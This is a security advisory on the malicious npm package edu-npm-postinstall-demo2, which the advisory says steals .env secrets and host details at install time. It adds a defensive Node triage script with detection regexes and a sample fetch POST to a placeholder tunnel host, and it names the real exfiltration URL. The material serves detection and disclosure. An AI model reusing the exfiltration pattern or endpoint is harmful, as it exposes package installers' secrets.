Vulnerability
Malicious code in edu-npm-postinstall-demo2 (npm)
## Source: amazon-inspector (ce30f195fb63661526196defd7d613a58ded58acd1208989400bf6267de6bfb1)

On `npm install`, postinstall.js reads the installer's `.env` file from INIT_CWD, harvests environment variable values (DEMO_-prefixed), collects host identifiers via os.hostname() and os.platform(), and POSTs the combined payload to a hardcoded ngrok tunnel at https://scary-blooper-brewery.ngrok-free.dev/collect. The package describes itself as an educational demo, but the destination is an anonymous, author-mutable tunneling host with no publisher relationship: the canonical install-time exfiltration shape.

Additionally, package.json declares a `build` script pointing at scripts/mine_cyrpto.js (misspelled "crypto"); the file is currently empty and not auto-invoked, but its presence in the tarball is a quality/intent signal alongside the exfiltration.

Installer harm is concrete and automatic on default install: filesystem read of installer secrets, host fingerprinting, and outbound transmission to an attacker-style endpoint.

## Source: ossf-package-analysis (fb14831b7d92cfc67e25e029a80fd7a2fb855e68863a0f08f71e8d5fe41fe7ea)

The OpenSSF Package Analysis project identified 'edu-npm-postinstall-demo2' @ 1.0.3 (npm) as malicious. It is considered malicious because:

- The package communicates with a domain associated with malicious activity.
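As an added example that is not part of this advisory or of either scanner's tooling, the following Node script triages a package before installation for the shape described above: install lifecycle hooks that read the installer's `.env` or environment, fingerprint the host, and send data out, plus script entries pointing at tunnel hosts or at missing/empty files. The signal regexes, the tunnel-host list, the verdict rule and the sample package are all assumptions constructed for this example.

```javascript
// Added example (not code from the advisory or from either scanner): a pre-install
// triage check for the install-time exfiltration shape described above. The signal
// regexes, tunnel-host list and verdict rule are assumptions, not a published ruleset.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const TUNNEL_HOST = /\b[\w.-]+\.(ngrok(-free)?\.(dev|app|io)|trycloudflare\.com|loca\.lt)\b/i;
const SIGNALS = [
  ['reads-installer-cwd', /\bINIT_CWD\b/], // reaches into the installer's project, not its own
  ['reads-dotenv', /['"`]\.env['"`]/],
  ['harvests-env', /process\.env\b/],
  ['host-fingerprint', /\bos\.(hostname|platform|userInfo|networkInterfaces)\s*\(/],
  ['outbound-http', /\b(fetch|https?\.(request|get)|axios\.(post|get))\s*\(/],
];
// pkg: parsed package.json; files: { relativePath: sourceText } taken from the tarball.
function triagePackage(pkg, files) {
  const findings = [];
  for (const [hook, cmd] of Object.entries(pkg.scripts || {})) {
    // Pull the script file out of a command such as "node postinstall.js".
    const target = (cmd.match(/[\w./-]+\.[cm]?js\b/) || [])[0];
    const body = target && target in files ? files[target] : '';
    if (INSTALL_HOOKS.includes(hook)) {
      const signals = SIGNALS.filter(([, re]) => re.test(body)).map(([id]) => id);
      const tunnel = body.match(TUNNEL_HOST);
      if (tunnel) signals.push('tunnel-host:' + tunnel[0]);
      findings.push({ hook, target, signals });
    }
    // A script entry pointing at a missing or empty file is a quality/intent signal.
    if (target && !(target in files)) findings.push({ hook, target, signals: ['missing-file'] });
    else if (target && files[target].trim() === '') findings.push({ hook, target, signals: ['empty-file'] });
  }
  return findings;
}
// Verdict rule (assumption): an install hook that talks to a tunnel host, or that both
// collects local data (secrets or host identity) and sends something out.
function isInstallTimeExfil(findings) {
  const collects = ['reads-dotenv', 'harvests-env', 'host-fingerprint'];
  return findings.some(f => INSTALL_HOOKS.includes(f.hook) && (
    f.signals.some(s => s.startsWith('tunnel-host:')) ||
    (f.signals.includes('outbound-http') && f.signals.some(s => collects.includes(s)))));
}
// Constructed sample mirroring the advisory: the script body is a few indicator fragments,
// not the package's real code, and the tunnel host is a placeholder.
const SAMPLE_PKG = { scripts: { postinstall: 'node postinstall.js', build: 'node scripts/mine_cyrpto.js' } };
const SAMPLE_FILES = {
  'postinstall.js': "fs.readFileSync(path.join(process.env.INIT_CWD, '.env'))\n" +
    "os.hostname(); os.platform()\n" +
    "fetch('https://placeholder-tunnel.ngrok-free.dev/collect', { method: 'POST' })",
  'scripts/mine_cyrpto.js': '',
};
const sampleFindings = triagePackage(SAMPLE_PKG, SAMPLE_FILES);
console.log(JSON.stringify(sampleFindings, null, 1), '\ninstall-time exfil:', isInstallTimeExfil(sampleFindings));
```

Run it against an unpacked tarball (`npm pack` then extract) before the package ever reaches an `npm install`, so the hook never executes during triage.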
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.
No EPSS score yet. FIRST.org publishes EPSS daily, but coverage isn't universal: pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands.
No exploitation, limited impact or prevalence